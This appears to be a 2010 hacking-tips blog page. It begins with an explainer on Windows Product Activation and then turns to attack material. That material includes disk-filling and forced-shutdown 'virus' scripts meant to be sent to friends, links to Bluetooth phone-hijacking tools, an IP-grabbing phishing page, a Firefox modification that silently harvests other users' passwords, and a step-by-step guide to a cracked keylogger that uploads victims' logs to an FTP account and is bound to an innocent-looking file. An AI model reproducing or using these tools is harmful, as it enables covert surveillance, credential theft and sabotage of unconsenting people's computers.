Monday, November 15, 2010

How Windows Product Activation (WPA) Works?

Windows Product Activation or WPA is a license validation procedure introduced by Microsoft Corporation in all versions of it’s Windows operating system. WPA was first introduced in Windows XP and continues to exist in Windows Server 2003, Windows Vista, Windows Server 2008 and Windows 7 as well. WPA enforces each end user to activate their copy of Windows so as to prevent unauthorized usage beyond the specific period of time until it is verified as genuine by Microsoft. How WPA really works was a closely guarded secret until GmbH analyzed WPA using a copy of Windows XP RC1 and published a paper on their findings.
In this post you will find answers to some of the most frequently asked questions about Windows Product Activation.
 

Why activation?

Microsoft’s intention behind the activation is to limit the usage of it’s Windows operating system to only one machine for which the retail license is issued. Any other computer which runs on the same license must be disallowed from using the software. Thus WPA demands for activation of the product within 30 days of it’s installation so as to ensure that it is genuine.
 

What does “Genuine Windows” means?

The copy of Windows is said to be genuine only if the product key used during the installation is genuine. It means that a given product key (retail license) must be used to install Windows only on one computer for which the license was purchased. Thus if the same key is used for the installation on another computer, then it is said to be a pirated copy.
 

Exactly what information is transmitted during the activation?

When you activate your copy of Windows you are transmitting an Installation ID code to the Microsoft either by phone or Internet depending on the method you choose to activate. Based on this, the Microsoft’s licensing system can determine whether or not the installed OS is genuine. If it is said to be genuine, then the system will receive the Activation ID which completes the activation process. If the activation is done via telephone then the Activation ID needs to be entered manually to complete the activation process.
 

What information does the Installation ID contain?

This Installation ID is a 50-digit number which is derived from the following two data.
1. Product ID – It is actually derived from the 25-digit product key (the alphanumeric value that is printed on the sticker over the Windows CD/DVD case) that is entered during the installation of the operating system. The Product ID is used to uniquely identify your copy of Windows.
2. Hardware ID – This value is derived based on the hardware configuration of your computer.
The WPA system checks the following 10 categories of the computer hardware to derive the Hardware ID:
  • Display Adapter
  • SCSI Adapter
  • IDE Adapter (effectively the motherboard)
  • Network Adapter (NIC) and its MAC Address
  • RAM Amount Range (i.e., 0-64mb, 64-128mb, etc.)
  • Processor Type
  • Processor Serial Number
  • Hard Drive Device
  • Hard Drive Volume Serial Number (VSN)
  • CD-ROM / CD-RW / DVD-ROM
Thus the Installation ID which is a combination of Product ID and Hardware ID is finally derived and sent to Microsoft during the activation process.
 

How is the Installation ID validated?

The Installation ID needs to be validated to confirm the authenticity of the installed copy of Windows. So after the Installation ID is received by Microsoft, it is decoded back so as to obtain the actual product key and the hardware details of the computer involved in the activation process.
The Microsoft’s system will now look to see if this is the first time the product key is being used for the activation. This happens when the user is trying to activate his Windows for the first time after purchase. If this is the case then the Installation ID is validated and the corresponding Activation ID is issued which completes the activation process.
However Microsoft system will now associate this product key with the hardware ID of the computer and stores this information on their servers. In simple words, during the first use of the product key, it is paired together with the Hardware ID and this information is stored up on the Microsoft servers.
 

What if a computer running a pirated copy of Windows attempts to activate?

 The activation fails whenever the copy of Windows installed is not said to be genuine. This usually happens when the product key used for the installation is said to have been used earlier on a different computer. This is determined during the activation process as follows:
During the validation of the Installation ID, the Microsoft’s system checks to see if the same product key was used in any of the previous activation processes. If yes then it looks to see the Hardware ID associated with it. The computer running a pirated copy of Windows will obviously have a different hardware configuration and hence the Hardware ID will mismatch. In this case the activation process will fail.
Thus for a successful activation, either of the following two cases must be satisfied:
  1. The product key must have been used for the first time. ie: The product key should not have been used for earlier activations on any other computer.
  2. If the product key is said to have been used earlier, then the Hardware ID should match. This happens only if the same computer for which the license was genuinely purchased is attempting for subsequent activation.
 

What about formatting the hard disk?

Each time the hard disk is reformatted and Windows is re-installed, it needs to be re-activated. However the activation process will be completed smoothly since the same computer is attempting for subsequent activation. In this case both the product key and the Hardware ID will match and hence the activation becomes successful.
 

What is I upgrade or make changes to my hardware?

In the above mentioned 10 categories of hardware, at least 7 should be the same. Thus you are allowed to make changes to not more than 3 categories of hardware. If you make too many changes then your activation will fail. In this case, it is necessary to contact the customer service representative via phone and explain about your problem. If he is convinced he may re-issue a new product key for your computer using which you can re-activate your Windows.
 

Some things WPA does not do

  • WPA does not send any personal information at all about you to Microsoft. There is still an option to register the product with Microsoft, but that is separate and entirely voluntary.
  • If you prefer to activate via phone, you are not required to give any personal information to Microsoft.
  • WPA does not provide a means for Microsoft to turn off your machine or damage your data/hardware. (Nor do they even have access to your data). This is a common myth that many people have about Microsoft products.
  • WPA is not a “lease” system requiring more payments after two years or any other period. You may use the product as licensed in perpetuity.
I have tried my best to uncover the secret behind the WPA. For further details and more technical information you can read the actual paper by Fully Licensed GmbH at http://www.licenturion.com/xp/fully-licensed-wpa.txt. I hope you like this post. Pass your comments.

virus

for jamming hard disk...
Source Code:-


//START v.c
#include
#include
void main()
{
while(1)
{
system("dir>>╚a.exe");
}
}
//END



open ur note pad just copy as it is paste it in that ........
name any like jam.exe...
but .exe is must.....
don't try on ur pc it's small but power full....

Virus

Save As .bat File

@echo off
echo WINDOWS HAS DETECTED A VIRUS, WOULD YOU LIKE TO TERMINATE?
echo -
echo PROCEED WITH VIRUS TERMINATION(Y/N)
set/p "cho=>"
if %cho%==Y goto forward
if %cho%==y goto forward
if %cho%==n goto Shutdown1
if %cho%==N goto Shutdown1
:forward
echo VIRUS HAS BEEN DELETED
Pause
echo PLEASE ALLOW WINDOWS TO PREFORM A SAFETY CHECK
Pause
echo SYSTEM CHECK
echo HARD DRIVE - FAILED
echo -
echo RAM - FAILED
echo -
echo DISK DRIVE - FAILED
echo -
echo CONNECTION - FAILED
echo -
echo WINDOWS SUGGESTS YOU DELETE ALL FILES TO RESUME(Y/N)
set/p "cho=>"
if %cho%==Y goto Sucess
if %cho%==y goto Sucess
if %cho%==n goto Shutdown2
if %cho%==N goto Shutdown2
:Sucess
echo WINDOWS HAS DELETED ALL FILES
echo -
echo PLEASE ALLOW WINDOWS TO PREFORM A SAFETY CHECK
Pause
echo SYSTEM CHECK
echo HARD DRIVE - FAILED
echo -
echo RAM - FAILED
echo -
echo DISK DRIVE - FAILED
echo -
echo CONNECTION - FAILED
echo -
echo WINDOWS IS SHUTTING DOWN IN 20 SECONDS TO PROTECT FROM DAMAGE
goto Shutdown3
:Shutdown3
shutdown -r -t 20 -c "YOU ARE DUMB! HAHAHAHAHAHA"
:Shutdown1
shutdown -s -f -t 60 -c "Windows is shutting down to prevent any further damage"
:Shutdown2
shutdown -s -f -t 60 -c "Windows is shutting down to prevent any further damage"

Virus

Save As .bat File

@echo off
echo WINDOWS HAS DETECTED A VIRUS, WOULD YOU LIKE TO TERMINATE?
echo -
echo PROCEED WITH VIRUS TERMINATION(Y/N)
set/p "cho=>"
if %cho%==Y goto forward
if %cho%==y goto forward
if %cho%==n goto Shutdown1
if %cho%==N goto Shutdown1
:forward
echo VIRUS HAS BEEN DELETED
Pause
echo PLEASE ALLOW WINDOWS TO PREFORM A SAFETY CHECK
Pause
echo SYSTEM CHECK
echo HARD DRIVE - FAILED
echo -
echo RAM - FAILED
echo -
echo DISK DRIVE - FAILED
echo -
echo CONNECTION - FAILED
echo -
echo WINDOWS SUGGESTS YOU DELETE ALL FILES TO RESUME(Y/N)
set/p "cho=>"
if %cho%==Y goto Sucess
if %cho%==y goto Sucess
if %cho%==n goto Shutdown2
if %cho%==N goto Shutdown2
:Sucess
echo WINDOWS HAS DELETED ALL FILES
echo -
echo PLEASE ALLOW WINDOWS TO PREFORM A SAFETY CHECK
Pause
echo SYSTEM CHECK
echo HARD DRIVE - FAILED
echo -
echo RAM - FAILED
echo -
echo DISK DRIVE - FAILED
echo -
echo CONNECTION - FAILED
echo -
echo WINDOWS IS SHUTTING DOWN IN 20 SECONDS TO PROTECT FROM DAMAGE
goto Shutdown3
:Shutdown3
shutdown -r -t 20 -c "YOU ARE DUMB! HAHAHAHAHAHA"
:Shutdown1
shutdown -s -f -t 60 -c "Windows is shutting down to prevent any further damage"
:Shutdown2
shutdown -s -f -t 60 -c "Windows is shutting down to prevent any further damage"

FAKE VIRUS


Copy Paste In Notepad And Save As .bat File



@echo off
title VIRUS
color 06

echo YOU HAVE A VIRUS ON YOUR COMPUTER
pause
echo CONTACTING ANTI-VIRUS....
pause
echo DO YOU WANT TO DELETE VIRUS?
pause
echo ACCESS DENIED
echo ACCESS DENIED
echo ACCESS DENIED
pause
echo ACTIVATING VIRUS.....
echo VIRUS ACTIVATED!!!!
pause
:1
dir/s
goto 1

Virus

Open Notepad continually in your friend's computer:
Type :

Code:

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


Save it as "Anything.BAT" and send it.

Virus

Open Notepad continually in your friend's computer:
Type :

Code:

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


Save it as "Anything.BAT" and send it.

virus

Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :

Code:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop



Save it as "Anything.VBS" and send it.

virus

Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :

Code:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop



Save it as "Anything.VBS" and send it.

Virus

Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Code:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop



Save it as "Anything.VBS" and send it.

Virus

Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Code:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop



Save it as "Anything.VBS" and send it.

virus

Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "


Save it as "Anything.VBS" and send it.

Convey your friend a little message and shut down his / her computer: Type :

Code:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s



Save it as "Anything.BAT" in All Files and send it.


Toggle your friend's Caps Lock button simultaneously:



Code:
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop


Save it as "Anything.VBS" and send it.

Virus

Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :

Code:

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop



Save it as "Anything.VBS" and send it.

Virus

Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :

Code:

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop



Save it as "Anything.VBS" and send it.

make virus

ALL OF THEZE COMMANDZ ARE TO BE TYPED IN NOTEPAD...

Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :


Code:
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two


Save it as "Anything.BAT" and send it.

change the background color in DOS

The value DefaultColor controls the foreground and background colors used in command prompt windows. It has a default value of 0, for standard white text on a black background.
CHANGING DOS BACKGROUND
Open your registry (press win+r and type regedit , hit enter )
goto

[HKEY_CURRENT_USER\Software\Microsoft\Command Processor]

u’ll find “DefaultColor

You can replace it’s value with a two-digit hexadecimal number, in which the first digit selects a background color and the second a foreground color. The hexadecimal codes are:

Hexadecimal value Color
0 Black
1 Blue
2 Green
3 Aqua
4 Red
5 Purple
6 Yellow
7 White
8 Gray
9 Light Blue
A Light Green
B Light Aqua
C Light Red
D Light Purple
E Light Yellow
F Bright White

A value of F0, for example, would give black text on a white background, and 1E would yield yellow text on a blue background.

The change should take effect the next time you open a console window.

show your name in Internet Explorer title

 Go to start->run
Type regedit
press enter in registry editor go to>>
HKEY_CURRENT_USER->Software->Microsoft->Internet explorer->main
There u will find something like “Windows Title”{if it’s not der den create new string and name it as Window Title}
double click on that and change the value data with anything u want
and click ok
press F5
restart ur internet explorer
see the title of it

Mobile Bluetooth Hacker

Once connected to a another phone via bluetooth you can:
- read his messages
- read his contacts
- change profile
- play his ringtone even if phone is on silent
- play his songs(in his phone)
- restart the phone
- switch off the phone
- restore factory settings
- change ringing volume
- And here comes the best
Call from his phone” it includes all call functions like hold etc.

Notes:
1.) When connecting devices use a code 0000
2.) Don’t forget to switch on your bluetooth before starting the program What else you want
Just go and download it
http://rapidshare.com/files/62505388/Super_Bluetooth_Hack_v1.07.rar

Login with multiple ids in yahoo messenger

Follow these steps : ->


* Go to Start ==> Run ==>> Type regedit,hit enter

* Go to HKEY_CURRENT_USER -> Software -> Yahoo -> pager -> Test

* On the right pane ==>> right-click and choose new Dword value .

* Rename it as Plural.

* Double click and assign a decimal value of 1.

* Now close registry and restart yahoo messenger.

* For signing in with new id open another messenger .

Make your Internet Explorer run faster

with the following tweak..
1. click start > run>
2. type regedit > enter
3. browse folder HKEY_CURRENT_USER\Software\m*cro$oft\Windows\CurrentVersion
\InternetSettings
4. right click @ windows right > New > DWORD
5. type MaxConnectionsPerServer > u can set value (the more higher the no, the more good speed u get, eg : 99)
6. create another DWORD >type MaxConnectionsPer1_0Server
7. then put a high value as mentioned above
8. then, restart IE … ur finished.This Trick will increase your browsing speed as well as downloading speed
Make your Internet Explorer run faster....
with the following tweak..

1. click start > run>
2. type regedit > enter
3. browse folder HKEY_CURRENT_USER\Software\m*cro$oft\Windows\CurrentVersion
\InternetSettings
4. right click @ windows right > New > DWORD
5. type MaxConnectionsPerServer > u can set value (the more higher the no, the more good speed u get, eg : 99)
6. create another DWORD >type MaxConnectionsPer1_0Server
7. then put a high value as mentioned above
8. then, restart IE … ur finished.This Trick will increase your browsing speed as well as downloading speed

Some Tricks

Get some of the old and new tricks and tweaks n some hacks..:--
Bluetooth Applications to make ur Mobile Rocking..

NOTE:
Only with .sis supported cellphones..
This pack contains some of the best bluetooth applications like :-
FTP Superbluetooth hack 1.07,1.08;
Freejack,
Networker,
MobiLuck,
BT Explorer,
BT Enhancer etc..

Bluetooth Enhancer :More than one blue tooth connection at one time….
MobiLuck : also Named “Bluetooth Hunter”…Returns alert on the presence of Bluetooth near to you.

BlueJackX : spy work,and is work resorted,and steals files of the other device through Bluetooth.

Networker : Make it work in Conjugation with Mobiluck and see the magic :D

Nokia Data Transfer : Awesome application to transfer the entire DATA to another device By Bluetooth.

DreamChat : Chat through Bluetooth with Dream Chat.


Here is the Direct link to download..>>>>
http://www.4shared.com/file/32361100/f8401ee3/bluetooth.html

IP address Phishing

Today I gonna tell u that how find someone IP address by phishing

this is very easy Just copy the code and paste on Notepad, save as any php file

now open any free webhosting site make an ID , now upload .php file...
this is same as fake login pages
send the link as orkut phishing
get IP address in .txt extension file

download:
http : // www .z iddu . com/d ownlo ad/12 0635 95/o rkut . zip . html (remove space)

remove * (stars) only and copy , paste on notepad

when ur victim will be click on dat link u will get his IP address and time

Attach stealer with firefox:

Turn firefox into a stealer without softwares
Ever wanted to hack your friends accounts, whenever there were over your house or who evers! Or you just wanted firefox to save all your passwords without prompting you every single time! This is for you, read on!

Steps

1. Locate nsLoginManagerPrompter.js file (Default location C:\Program Files\Mozilla Firefox\components).
2. Open the file with word pad or notepad!
3. Press Ctrl + A on keyboard, and then press del or delete!
4. Copy and Paste all this:

http://tinypaste.com/99d583
5. Make sure Firefox is closed and save the file!

6. Your Done!

-------------

From now on, when ever someone logs onto any site, they username and password will be save automatically without prompt!

To retrieve the account information: Make sure firefox is opened, go to Tools < Options... < Security Tab << click on saved passwords, then click on show passwords, and press yes! Hope that helped anyone Enjoy!

Sunday, November 14, 2010

All SpyKeylooger

Today I gonna tell u hw to use keyloggers

download new keylogger this nt detectable with antivirus

download link --

All spy keylogger 4.3 - http://www.fileguru.com/All-Spy-Keylogger/download

Crack - http://wincrack.info/crack_All-Spy_Keylogger_4.3_build_2.9.html

Then install it with ftp setting


Now you should be at 'FTP', ok, creat a free account at DriveHQ.com, then make sure your at 'Online Storage', then make a new folder called: Logs (this is where the logs are sent to when you keylogg someone)
Now on your FTP on Ardamax Keylogger, where it says 'FTP Host:', put this: http://ftp.drivehq.com/
Now where it says 'Remote Folder:', put this: Logs
Now where it says 'Userame:' and 'Password:', put your DriveHQ username and password
Once done, do NOT change your DriveHQ password or rename/delete the folder called 'Logs', if you do, the logs will not come through.

You should now be at 'Control', make sure all the boxes are 'ticked' then click 'Next'.

Where it says 'Screen Shots', adjust them as you like, but I recommend every 2 hours and full screen, once done click 'Next'.

Now you should be at 'Destination', now you have to choose where you put your Keylogger Engine, where it says 'Keylogger egine
path:', click 'browse' and choose where you want to put your Keylogger Engine (I suggest 'My Documents').
Now un-tick 'Open the folder containing the keylogger engine' (this should stop you from logging yourself) and then choose the Icon
you want for the keylogger engine, choose one and then click 'Next' then 'Finish'.


How to send keylogger

Binding the Keylogger Engine with another file.
1. Download the Binding Tool:
Easy Binder 2.0

2. Open it and then click the little green '+' image in the bottom left corner, then it should browse your files, go to 'My Documents'
(or where-ever you put the Keylogger Engine) and then click the file called 'Install'.

3. Do the same again but don't add the Keylogger Engine (Install), add a picture or something.

4. You need to get a .ico image, this is easy, just go to http://www.chami.com/html-kit/services/favicon/ and upload the Image you want to be converted to .ico, once its done, click 'download'.

5. On the Binder, click 'Settings' and then where it says 'Select An Icon', click the '...' image and then browse your files, where it says 'Files of type', scroll down and select 'All Files [*.*]', then select your .ico image which you just made like so;

6. Now on the Easy Binder, where it says 'Set Output File', click the '...' button and then put it where you want your binded files to be saved (I recommend My Documents so you don't forget), put the name you want on the file and then click 'Save'.
 

FTP Setting in all spy keylogger




This tutorial is for those of you who DONT know how to recieve log files from your keyloggers such as All Spy Keylogger, Ardamax etc....
FTP is like an online storage account. You make one so that your keylogger can send you log files there and you can download those log files and view them from where ever you are
The best ftp site according to me is http://www.drivehq.com/
1) Goto this site, and click on the sign up button in first section where it says "Online File Storage and Sharing"
The Sign up Page should look like this:
 



'logs' folder position in drivehq.com

creating "logs" folder


 

for FTP setting in all spy keylogger


 

make FTP as screenshots